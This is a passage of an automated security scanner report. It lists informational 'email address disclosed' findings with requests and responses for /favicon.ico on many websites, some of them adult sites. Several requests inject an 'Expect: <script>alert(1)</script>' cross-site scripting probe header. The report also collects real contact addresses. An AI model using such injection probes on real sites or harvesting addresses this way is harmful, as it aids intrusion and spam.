...[SNIP]...
<a href="mailto:email@metroparks.org">email@metroparks.org</a>
...[SNIP]...

23.44. http://www.mkt3228.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mkt3228.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

abuse@rm04.net

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mkt3228.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:51:09 GMT
Server: Apache
Last-Modified: Mon, 25 Apr 2011 18:01:37 GMT
ETag: "48815b-cf1-4a1c1ffab0240"
Accept-Ranges: bytes
Content-Length: 3313
Connection: close
Content-Type: text/html; charset=UTF-8

<html>
<head>

<title>Anti-Spam and Privacy</title>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

</head>

<body bgcolor="#FFFFFF" text="#000000">

<h3><font face="Verda
...[SNIP]...
<a href="mailto:abuse@rm04.net">abuse@rm04.net</a>
...[SNIP]...

23.45. http://www.mnnews.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mnnews.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

info@mnnews.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mnnews.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:41:28 GMT
Server: Apache/2.2.3 (Debian) mod_python/3.2.10 Python/2.4.4 PHP/5.2.0-8+etch15 mod_ssl/2.2.3 OpenSSL/0.9.8c mod_perl/2.0.2 Perl/v5.8.8
Last-Modified: Thu, 07 Oct 2010 19:31:34 GMT
ETag: "4d40458-2b1c-f117b180"
Accept-Ranges: bytes
Content-Length: 11036
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8

<html>
   <head>
       <meta http-equiv="content-type" content="text/html;charset=iso-8859-1">
       <meta name="GENERATOR" content="Adobe PageMill 3.0 Mac">
       <title>Missing Page - 404 - Minnesota Newspape
...[SNIP]...
<a href="mailto:info@mnnews.com?Subject=MND">
...[SNIP]...
<a href="mailto:info@mnnews.com?Subject=MND-improv">
...[SNIP]...

23.46. http://www.monsterjam.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.monsterjam.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

websitesupport@feldinc.com

Request

Response

23.47. http://www.moultrieobserver.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.moultrieobserver.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

sa@zope.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.moultrieobserver.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.0 417 Expectation failed
Server: squid
Date: Tue, 03 May 2011 10:27:49 GMT
Content-Type: text/html
Content-Length: 1400
X-Squid-Error: ERR_INVALID_REQ 0
X-Cache: MISS from cache2.peak.zope.net
Via: 1.0 cache2.peak.zope.net:8500 (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<TITLE>ERROR
...[SNIP]...
<A HREF="mailto:sa@zope.com">sa@zope.com</A>
...[SNIP]...

23.48. http://www.mylovedanal.tv/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mylovedanal.tv
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

abuse@teenax.com

Request

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.20
Date: Tue, 03 May 2011 10:22:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 8777
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Last-Modified: Tue, 03 May 2011 10:22:44 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>The requested document was not found - My Loved Anal Videos</title>
<!--
...[SNIP]...
<a href="mailto:abuse@teenax.com?subject=abuse%20from%20site%20mylovedanal.tv">
...[SNIP]...

23.49. http://www.mylovedasses.tv/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mylovedasses.tv
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

abuse@teenax.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mylovedasses.tv
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.20
Date: Tue, 03 May 2011 11:18:43 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 8711
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Last-Modified: Tue, 03 May 2011 11:18:43 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>The requested document was not found - My Loved Asses Videos</title>
<!-
...[SNIP]...
<a href="mailto:abuse@teenax.com?subject=abuse%20from%20site%20mylovedasses.tv">
...[SNIP]...

23.50. http://www.mylovedrubber.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mylovedrubber.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

abuse@teenax.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mylovedrubber.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.20
Date: Tue, 03 May 2011 11:40:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Keep-Alive: timeout=20
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 8641
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Last-Modified: Tue, 03 May 2011 11:40:12 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>The requested document was not found - My Loved Rubber Pictures</title>

...[SNIP]...
<a href="mailto:abuse@teenax.com?subject=abuse%20from%20site%20mylovedrubber.com">
...[SNIP]...

23.51. http://www.nationnews.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nationnews.com
Path:	/favicon.ico

Issue detail

The following email addresses were disclosed in the response:

carolmartindale@nationnews.com
janicegriffith@nationnews.com
webmaster@nationnews.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nationnews.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Tue, 03 May 2011 11:25:57 GMT
Vary: Accept-Encoding
imagetoolbar: no
Content-Type: text/html; charset=utf-8
Content-Length: 20362
Date: Tue, 03 May 2011 11:27:09 GMT
X-Varnish: 1781753286 1781750354
Age: 72
Via: 1.1 varnish
Connection: keep-alive
X-Cache: Hit
X-Cache-Hits: 6

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<a href="mailto:webmaster@nationnews.com?subject=Query From NationNews.com - Technical Issues" title="Webmaster">webmaster@nationnews.com</a>
...[SNIP]...
<a href="mailto:carolmartindale@nationnews.com?subject=Query From NationNews.com - Content" title="Online Editor">carolmartindale@nationnews.com</a>
...[SNIP]...
<a href="mailto:webmaster@nationnews.com?subject=Query From NationNews.com - Technical Issues" title="Webmaster">
...[SNIP]...
<a href="mailto:carolmartindale@nationnews.com?subject=Query From NationNews.com - Content">
...[SNIP]...
<a href="mailto:janicegriffith@nationnews.com?subject=Query From NationNews.com - Press Releases">
...[SNIP]...

23.52. http://www.ntra.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ntra.com
Path:	/favicon.ico

Issue detail

The following email addresses were disclosed in the response:

tferrell@heraldprint.com
website@ntra.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ntra.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Date: Tue, 03 May 2011 11:22:49 GMT
Content-Type: text/html
Content-Length: 52392
Connection: keep-alive

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="mailto:mailto:tferrell@heraldprint.com?subject=Herald Printing Inquiry" rev="NTRAMENU" parentId="8" >
...[SNIP]...
<a href="mailto:mailto:tferrell@heraldprint.com?subject=Herald Printing Inquiry" rev="NTRAMENU" parentId="9" >
...[SNIP]...
<a href="mailto:website@ntra.com" class="footer_links_b" >
...[SNIP]...

23.53. http://www.okhistory.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.okhistory.org
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

webmaster@okhistory.org

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.okhistory.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:26:19 GMT
Server: Apache/2.0.52 (CentOS)
X-Powered-By: PHP/4.3.9
Content-Length: 7405
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head><meta http-equiv="Content-Type" co
...[SNIP]...
<a href="mailto:webmaster@okhistory.org">
...[SNIP]...

23.54. http://www.paparazzibeach.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.paparazzibeach.net
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

webmaster@advancedhosters.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.paparazzibeach.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Server: nginx/0.5.38
Date: Tue, 03 May 2011 10:38:20 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Content-Length: 504

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>417 Expectation Failed</TITLE>
</HEAD><BODY>
<H1>Expectation Failed</H1>
The expectation given in the Expect request-header
field
...[SNIP]...
<A HREF="mailto:webmaster@advancedhosters.com">
...[SNIP]...

23.55. http://www.princesshouse.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.princesshouse.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

webhelp@princesshouse.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.princesshouse.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:52:36 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=t5ugotvsibafefozyvahh4p0; path=/; HttpOnly
Set-Cookie: LangID=0; expires=Mon, 03-May-2021 10:52:36 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 30806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
Princess
...[SNIP]...
<a id="ContentPlaceHolder1_lnkPHWebEn" href="mailto:webhelp@princesshouse.com">
...[SNIP]...
<a id="ContentPlaceHolder1_lnkPHWebSp" href="mailto:webhelp@princesshouse.com">
...[SNIP]...

23.56. http://www.qianlong.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.qianlong.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

webmaster@fastcdn.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.qianlong.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation failed
Server: DnionOS/1.0
Date: Tue, 03 May 2011 11:11:06 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 1655
Expires: Tue, 03 May 2011 11:11:07 GMT
X-Squid-Error: ERR_INVALID_REQ 0
X-Cache: MISS from CT-FJPT-12-188.fastcdn.com

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML><HEAD>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=gb2312">
<TITLE>.......
...[SNIP]...
<A HREF="mailto:webmaster@fastcdn.com">webmaster@fastcdn.com</A>
...[SNIP]...

23.57. http://www.rapescenes.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rapescenes.net
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

webmaster@domain.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rapescenes.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:43:16 GMT
Server: Apache/2.2.3 (CentOS) PHP/5.2.14
Content-Length: 345
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
<hr>
<
...[SNIP]...
<a href="mailto:webmaster@domain.com">
...[SNIP]...

23.58. http://www.rb-hosting.de/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rb-hosting.de
Path:	/favicon.ico

Issue detail

The following email addresses were disclosed in the response:

info@rb-hosting.de
trapper@hitchhikers.de
webmaster@rb-hosting.de

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rb-hosting.de
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:38:35 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_gzip/1.3.26.1a PHP/4.3.10-22 mod_fastcgi/2.4.2 mod_ssl/2.8.22 OpenSSL/0.9.7e
X-Powered-By: PHP/4.3.10-22
Connection: close
Content-Type: text/html; charset=iso-8859-1
Content-Length: 11544

<HTML>
<HEAD>
   <TITLE>Benecke Internetdienstleistungen </TITLE>
   <LINK REL="stylesheet" MEDIA=screen type="text/css" href="css.php">

   
   <script langauge="JavaScript"><!--

...[SNIP]...
Mails to these addresses will be put in our SPAM database. If you send a
mail to this address, YOU WILL BE LISTED IN OUR BLOCKLIST AND NO LONGER BE ABLE TO
SEND US ANY MORE MAIL. So, DO NOT DO IT!
trapper@hitchhikers.de
<a href='mailto:trapper@hitchhikers.de'>trapper@hitchhikers.de</a>
...[SNIP]...
<a style="color:#888; font-size:80%; text-align:right; text-decoration:underline; width:100%; display:block; " href="mailto:info@rb-hosting.de">
...[SNIP]...
<a href='mailto:webmaster@rb-hosting.de?Subject:Bestellung%20Webhosting'>
...[SNIP]...

23.59. http://www.rv-clubs.us/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rv-clubs.us
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

info@rv-clubs.us

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.rv-clubs.us
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:46:55 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 10671

<HTML>
<HEAD>
<TITLE>RV Clubs - 404 Page Not Found Error</TITLE>
<META name="Keywords" content="rv clubs, rv links">
<META name="Description" content="RV Website 404 Page Not Found Error links">

...[SNIP]...
<A href="mailto:info@rv-clubs.us">
...[SNIP]...
<a href="mailto:info@rv-clubs.us?Subject=Go%20Campin%27%20Website%20Error">
...[SNIP]...
<a href="mailto:info@rv-clubs.us">
...[SNIP]...

23.60. http://www.save2pc.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.save2pc.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

support@save2pc.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.save2pc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:44:36 GMT
Server: Apache/2.2.17 (FreeBSD) DAV/2 PHP/5.3.6 with Suhosin-Patch
X-Powered-By: PHP/5.3.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10180

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>save2pc</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251"
...[SNIP]...
<a href="mailto:support@save2pc.com" title=Contacts>Contact us: support@save2pc.com</a>
...[SNIP]...

23.61. http://www.secretaryinstocking.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.secretaryinstocking.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

webmaster@advancedhosters.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.secretaryinstocking.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.6.39
Date: Tue, 03 May 2011 11:29:19 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Content-Length: 336

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /favicon.ico was not found on this server.<P>
<HR>
<ADDR
...[SNIP]...
<A HREF="mailto:webmaster@advancedhosters.com">
...[SNIP]...

23.62. http://www.socializr.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.socializr.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

jobs@socializr.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.socializr.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 /favicon.ico
Cache-Control: private
Content-Type: text/html;charset=ISO-8859-1
Date: Tue, 03 May 2011 11:09:05 GMT
Server: Commodore 64 HTTPD
Content-Length: 7734

<!DOCTYPE HTML PUBLI
...[SNIP]...

...[SNIP]...

23.63. http://www.sololadyboys.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sololadyboys.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

webmaster@advancedhosters.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sololadyboys.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:16:18 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.9
Content-Type: text/html; charset=iso-8859-1
Content-Length: 329

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /favicon.ico was not found on this server.<P>
<HR>
<ADDR
...[SNIP]...
<A HREF="mailto:webmaster@advancedhosters.com">
...[SNIP]...

23.64. http://www.stopsacidreflux.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.stopsacidreflux.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

Info@StopsAcidReflux.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.stopsacidreflux.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

23.65. http://www.tcoasttalk.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tcoasttalk.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

BackyardPix@pbpost.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tcoasttalk.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

23.66. http://www.teriskitchen.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.teriskitchen.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

teri@teriskitchen.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.teriskitchen.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

23.67. http://www.tireteam.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tireteam.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

sales@tireteam.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tireteam.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

23.68. http://www.torontolife.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.torontolife.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

online@torontolife.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.torontolife.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

23.69. http://www.twoofus.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.twoofus.org
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

info@healthymarriageinfo.org

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.twoofus.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

23.70. http://www.upskirtphotos.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.upskirtphotos.org
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

webmaster@advancedhosters.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.upskirtphotos.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Tue, 03 May 2011 10:38:46 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.8
Content-Type: text/html; charset=iso-8859-1
Content-Length: 503

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>417 Expectation Failed</TITLE>
</HEAD><BODY>
<H1>Expectation Failed</H1>
The expectation given in the Expect request-header
field
...[SNIP]...
<A HREF="mailto:webmaster@advancedhosters.com">
...[SNIP]...

23.71. http://www.vermontjoblink.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vermontjoblink.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

joseph.lucia@state.vt.us

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.vermontjoblink.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

23.72. http://www.vintagefield.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vintagefield.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

webmaster@advancedhosters.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.vintagefield.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.62
Date: Tue, 03 May 2011 10:56:30 GMT
Content-Type: text/html; charset=iso-8859-1
Connection: keep-alive
Content-Length: 329

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /favicon.ico was not found on this server.<P>
<HR>
<ADDR
...[SNIP]...
<A HREF="mailto:webmaster@advancedhosters.com">
...[SNIP]...

23.73. http://www.wellspan.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wellspan.org
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

info@medseek.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wellspan.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 10:36:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


...[SNIP]...

23.74. http://www.wetmaturevids.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wetmaturevids.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

webmaster@advancedhosters.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wetmaturevids.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:24:06 GMT
Server: Apache/1.3.41 (Unix) PHP/5.2.8
Content-Type: text/html; charset=iso-8859-1
Content-Length: 330

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /favicon.ico was not found on this server.<P>
<HR>
<ADDR
...[SNIP]...
<A HREF="mailto:webmaster@advancedhosters.com">
...[SNIP]...

23.75. http://www.wordplays.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wordplays.com
Path:	/favicon.ico

Issue detail

The following email address was disclosed in the response:

webmaster@wordplays.com

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wordplays.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Tue, 03 May 2011 11:05:45 GMT
